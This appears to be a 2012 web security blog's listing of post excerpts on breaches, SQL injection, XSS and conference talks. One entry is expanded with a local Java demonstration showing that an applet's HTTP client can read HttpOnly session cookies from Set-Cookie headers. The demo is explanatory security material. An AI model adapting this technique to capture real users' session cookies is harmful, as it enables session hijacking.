Surviving the Week 10/19/12
Security Flaw Found in Steam Hackers could have a new means of accessing your computer through a browser command that uses Valve’s software distribution system […]
The Cloud is a Scary Place Security lapses such as XSS, CSRF, SQLi, or authentication bypass are not always easy to uncover for cloud companies such […]
Enterprises Struggle With Business Logic Attacks, Survey Finds A new survey emphasizes how business logic attacks can slip under the radar of development teams and […]
Passwords of 100k IEEE members lie bare on FTP server IEEE uses Akamai for content delivery. An FTP server directory was discovered that contained log […]
2012 HouSecCon, 10/11/2012 (in Houston) HouSecCon is coming up – October 11th in Houston. The agenda is shaping up with a bunch of hot topics […]
Surviving SQL Injection (link to free SQL Injection tool) SQL injection continues to be in the news each week. Despite the fact that it is the most […]
A Number of Exploits Including SQL Injection, XSS, and Authentication Bypass This week, researchers found some remarkable vulnerabilities including remote code execution, SQL injection, and […]
XSS: Gaining Access to HttpOnly Cookie Using the getHeaderField method of the Java HTTP API, any applet can read cookies that carry the HttpOnly flag, since that flag only restricts the browser's own script access (document.cookie), not an HTTP client that sees raw response headers. […]
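The mechanism behind that post, as an added example that is not code from the original post: a constructed local HttpServer stands in for the target application and re-issues an HttpOnly session cookie on every response (as many frameworks do), and a plain URLConnection client reads it straight out of the Set-Cookie headers. The class name, cookie name and cookie value are made up for the demo; in the real attack the request is made from an applet running in the victim's browser, so it carries the victim's session and the server's reply re-sets that session cookie.

```java
import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.HttpServer;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.InetSocketAddress;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;

public class HttpOnlyHeaderLeak {

    // Constructed stand-in for the target application: every response re-issues
    // the session cookie with HttpOnly set. Cookie name and value are made up.
    static HttpServer startServer() throws Exception {
        HttpServer server = HttpServer.create(new InetSocketAddress("127.0.0.1", 0), 0);
        server.createContext("/", (HttpExchange ex) -> {
            ex.getResponseHeaders().add("Set-Cookie",
                    "JSESSIONID=0123456789abcdef; Path=/; HttpOnly");
            byte[] body = "ok".getBytes(StandardCharsets.UTF_8);
            ex.sendResponseHeaders(200, body.length);
            try (OutputStream os = ex.getResponseBody()) {
                os.write(body);
            }
        });
        server.start();
        return server;
    }

    // What an applet can do: HttpOnly tells the browser to hide the cookie from
    // document.cookie, but Java's HTTP API hands back the raw response headers,
    // so Set-Cookie (HttpOnly or not) is readable by any code that makes a request.
    static List<String> readSetCookie(URL url) throws Exception {
        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
        List<String> found = new ArrayList<>();
        for (Map.Entry<String, List<String>> h : conn.getHeaderFields().entrySet()) {
            // The key is null for the status line; names are compared
            // case-insensitively because HttpServer normalises them ("Set-cookie").
            if (h.getKey() != null && h.getKey().equalsIgnoreCase("Set-Cookie")) {
                found.addAll(h.getValue());
            }
        }
        conn.disconnect();
        return found;
    }

    public static void main(String[] args) throws Exception {
        HttpServer server = startServer();
        try {
            URL url = new URL("http://127.0.0.1:" + server.getAddress().getPort() + "/");
            // The single-header form named in the post: getHeaderField(name) matches
            // case-insensitively and returns the last header with that name.
            System.out.println("getHeaderField(\"Set-Cookie\") = "
                    + url.openConnection().getHeaderField("Set-Cookie"));
            for (String cookie : readSetCookie(url)) {
                System.out.println("HttpOnly cookie visible to the client: " + cookie);
            }
        } finally {
            server.stop(0);
        }
    }
}
```

Compile and run with a standard JDK (the HttpServer class ships in the jdk.httpserver module); both lines print the HttpOnly cookie. The practical takeaways are that HttpOnly is a browser-side control with no effect on plugin or applet HTTP stacks, and that applications which re-emit the session cookie on every response make this kind of disclosure trivial.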
Get Off Your AMF and Don’t REST On JSON At “BSides Los Angeles“, I presented on “Get off your AMF and don’t REST on JSON”. […]
Sorry readers, last week’s post was missed due to an overwhelming amount of work in both the professional and personal areas. Thank you for holding […]
Web Apps Experience 2,700+ Attacks Per Year In a recent study, Imperva found that the average application can expect attack incidents 120 days per year […]
HTML5 Top 10 Attacks Last week at Black Hat, our team member Shreeraj Shah presented on threats against HTML5. The talk discussed the Top 10 Threats […]
CodeIgniter 2.1.1 Cross Site Scripting Bypass CodeIgniter is an open source Web Application Framework that helps authors write PHP applications. Version 2.1.1 of CodeIgniter suffers […]
Black Hat 2012 Coverage Dark Reading put together a list of interesting talks to headline at Black Hat this year. Check out their preview links. […]
Nvidia’s developer forums were hacked and 400,000 user accounts compromised. More games with “Who’s got the biggest bounty?” 400,000 is fairly respectable. Remember back in […]
Huge SQL injection knowledge base NTObjectives released a SQL Injection cheat sheet, which can be found at http://www.ntobjectives.com/go/sql-injection-cheat-sheet/. A more comprehensive knowledge base of SQL injection […]
Code Execution Vulnerability in Microsoft XML Core Services The vulnerable code path is “msxml3!_dispatchImpl::InvokeHelper”; if your software relies on MSXML, make sure to patch it. A vulnerability exists when […]
10 Vulnerable Web Applications You Can Play With There are a number of vulnerable web applications to be discovered. Many times we are asked for known […]
United States Department of Defense data leaked by Anonymous hackers A group named “Wikiboat” attacked the website of the Department of Defense and gained access […]
LinkedIn confirms hack, over 60% of stolen passwords already cracked LinkedIn, one of the most popular professional social networking sites, has confirmed a compromise of […]
A very interesting update on Flame, the malware targeting Middle Eastern countries, from Alexander Gostev at Kaspersky today, concerning its abuse of Microsoft as a trusted certificate authority. Malware is a […]
Revealed: Hundreds of words to avoid using online if you don’t want the government spying on you This week, The Department of Homeland Security has […]
It has not been a quiet week in the web application security arena; it was simply a busy week. Microsoft’s SDL Expands Beyond Redmond […]
Hmmm, let’s see if I even remember how to enter this stuff anymore… Yep, you guessed it, we finally recorded another episode – WOOT! Show […]
Podcast episode (duration 51:43, 72.7 MB).
WAF Wars WAFs are more commonly used as an IDS than as an IPS. This is mainly due to the volume of alerts they generate when […]